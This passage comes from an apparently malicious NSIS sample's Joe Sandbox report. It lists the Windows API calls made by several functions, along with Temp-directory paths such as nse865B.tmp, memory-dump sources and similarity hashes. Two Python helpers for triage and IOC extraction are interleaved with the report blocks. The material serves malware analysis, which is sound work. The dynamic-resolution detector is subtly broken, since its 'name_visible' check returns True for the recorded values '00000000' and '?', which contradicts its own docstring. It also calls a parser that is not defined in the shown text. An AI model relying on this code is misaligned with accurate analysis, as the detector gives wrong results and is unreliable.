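RESOLVE_SEQ = ("WideCharToMultiByte", "GlobalAlloc", "WideCharToMultiByte",
               "GetProcAddress", "GlobalFree")


def find_dynamic_resolution(
        calls: List[ApiCall]) -> Optional[Tuple[Optional[int], Optional[int], bool]]:
    """Return (call_site, first_arg, name_visible) for a matching GetProcAddress.

    RESOLVE_SEQ is matched in order but need not be contiguous; subcall lines
    are ignored. name_visible is False when lpProcName was recorded as 0 or "?",
    i.e. the export name is built at runtime and the listing cannot show it.
    """
    idx, hit = 0, None
    for c in calls:
        if c.subcall_of is not None or c.api != RESOLVE_SEQ[idx]:
            continue
        if c.api == "GetProcAddress":
            hit = c
        idx += 1
        if idx == len(RESOLVE_SEQ):
            break
    if idx < len(RESOLVE_SEQ) or hit is None:
        return None
    first = hit.args[0] if hit.args else None
    name_ptr = hit.args[1] if len(hit.args) > 1 else None
    return (hit.ref, first, bool(name_ptr))


# Sample listings copied from the report blocks on this page.
SAMPLE_RESOLVE = """
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1639
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1640
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1654
• GetProcAddress.KERNEL32(6E9B21F0,00000000), ref: 6E9B165B
• GlobalFree.KERNEL32(00000000), ref: 6E9B1664
"""
SAMPLE_SUBCALL = """
• GlobalFree.KERNEL32(00000000), ref: 6E9B24DA
  • Part of subcall function 6E9B122C: lstrcpynW.KERNEL32(00000000,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B123C
• GlobalAlloc.KERNEL32(00000040), ref: 6E9B2460
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E9B247B
"""
SAMPLE_FORMAT = """
• lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
• wsprintfW.USER32 ref: 00404B65
• SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
"""

if __name__ == "__main__":
    for name, text in (("resolve", SAMPLE_RESOLVE), ("subcall", SAMPLE_SUBCALL),
                       ("format", SAMPLE_FORMAT)):
        calls = parse_api_list(text)
        print(name, len(calls), "calls; dynamic resolution:", find_dynamic_resolution(calls))
```

Argument values in these listings are best-effort stack recovery ("?" marks values the plugin could not recover), so treat the first GetProcAddress argument as a recorded value rather than a confirmed HMODULE; the useful signal is the ordered sequence and the unrecovered name pointer, which tells the analyst to go to the 6E9B0000 memory dump for the actual export name.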
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                    • Opcode ID: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                                                                                                    • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                                                                                                    • Opcode Fuzzy Hash: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                                                                                                    • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                    • String ID: !
                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                    • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                                    • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                                                                                                    • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                                    • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                                    • wsprintfW.USER32 ref: 00404B65
                                                                                                                                                    • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
• Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
• Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
• Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
APIs
• CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
• CharNextW.USER32(00000000), ref: 00405C2A
• CharNextW.USER32(00000000), ref: 00405C42
Strings
• C:\Users\user\AppData\Local\Temp\nse865B.tmp, xrefs: 00405C18
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: CharNext
• String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp
• API String ID: 3213498283-2695492296
• Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
• Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
• Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
• Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
APIs
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
• lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-3936084776
• Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
• Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
• Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
• Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
APIs
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Close$Enum
• String ID:
• API String ID: 464197530-0
• Opcode ID: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
• Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
• Opcode Fuzzy Hash: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
• Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
APIs
• DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
• GetTickCount.KERNEL32 ref: 00402EAA
• CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
• ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
• Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
• Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
• Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
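The function summaries above share one fixed text layout: an "APIs" list of `Api.Module(args), ref: addr` lines (calls attributed to a callee are prefixed with "Part of subcall function"), an optional "Strings" list with `xrefs:`, a "Memory Dump Source" block and a "Similarity" block carrying the API ID. When triaging a report like this one, the values worth pulling out are the file paths passed as API arguments and the per-API call counts, so the Temp-directory artefacts (here the NSIS stub nse865B.tmp) can be collected as IOCs without reading every block. The parser below is an added example, not part of Joe Sandbox or of this report; it assumes only the section names and the `ref:`/`xrefs:` layout visible on this page. The sample text is typed in by hand from the summaries above (indentation and the "Associated:" lines dropped) and is not the report's full text.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the layout of the function summaries on this page.
# Hand-copied and shortened for the example; not the full report text.
SAMPLE = r"""
APIs
• CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,00405C8B), ref: 00405C25
• CharNextW.USER32(00000000), ref: 00405C2A
Strings
• C:\Users\user\AppData\Local\Temp\nse865B.tmp, xrefs: 00405C18
Similarity
• API ID: CharNext
• String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp
APIs
• DestroyWindow.USER32(00000000,00000000,00403059,00000001), ref: 00402E8C
• GetTickCount.KERNEL32 ref: 00402EAA
• CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
APIs
  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error), ref: 004062A4
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000), ref: 00405CCD
• GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\), ref: 00405CDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

# One API line. The argument list is optional: the report prints calls that
# take no arguments as "GetTickCount.KERNEL32 ref: ...".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^,()]*")  # drive-letter path, no commas/parens inside
SECTION_HEADERS = {"APIs", "Strings", "Similarity", "Memory Dump Source", "Joe Sandbox IDA Plugin"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                    # address of the call site
    subcall_of: Optional[str]   # set when the report attributes the call to a callee


@dataclass
class FunctionSummary:
    calls: list[ApiCall] = field(default_factory=list)
    strings: dict[str, str] = field(default_factory=dict)  # string -> xref address
    api_id: Optional[str] = None


def parse_summaries(text: str) -> list[FunctionSummary]:
    """Split report text into one FunctionSummary per 'APIs' header."""
    funcs: list[FunctionSummary] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":          # every "APIs" header starts a new function
                funcs.append(FunctionSummary())
            section = line
            continue
        if not funcs or not line.startswith("•"):
            continue                    # bullets before the first function, or stray text
        cur = funcs[-1]
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m:                       # unknown line shapes are skipped, not guessed at
                args = m.group("args")
                cur.calls.append(ApiCall(m.group("api"), m.group("mod"),
                                         args.split(",") if args else [],
                                         m.group("ref"), m.group("sub")))
        elif section == "Strings":
            s, sep, xref = body.rpartition(", xrefs: ")
            if sep:
                cur.strings[s] = xref
        elif section == "Similarity" and body.startswith("API ID:"):
            cur.api_id = body[len("API ID:"):].strip() or None
    return funcs


def file_paths(funcs: list[FunctionSummary]) -> dict[str, set[str]]:
    """Windows paths seen as API arguments or under Strings -> addresses that use them."""
    hits: dict[str, set[str]] = {}
    for f in funcs:
        for c in f.calls:
            for a in c.args:
                if WIN_PATH_RE.fullmatch(a):
                    hits.setdefault(a, set()).add(c.ref)
        for s, xref in f.strings.items():
            if WIN_PATH_RE.fullmatch(s):
                hits.setdefault(s, set()).add(xref)
    return hits


def api_counts(funcs: list[FunctionSummary]) -> Counter:
    """How often each Module.Api appears across all summarised functions."""
    return Counter(f"{c.module}.{c.api}" for f in funcs for c in f.calls)


if __name__ == "__main__":
    summaries = parse_summaries(SAMPLE)
    for path, refs in sorted(file_paths(summaries).items()):
        print(path, sorted(refs))
    print(api_counts(summaries).most_common(3))
```

Run it on a copy of the report's function-summary text to get the Temp-directory paths and the call sites that reference them; the same `ApiCall` records can be grouped by `api_id` to spot functions the report considers similar.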
                                                                                                                                                    APIs
  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
  • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405CCD
• GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 00405CDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
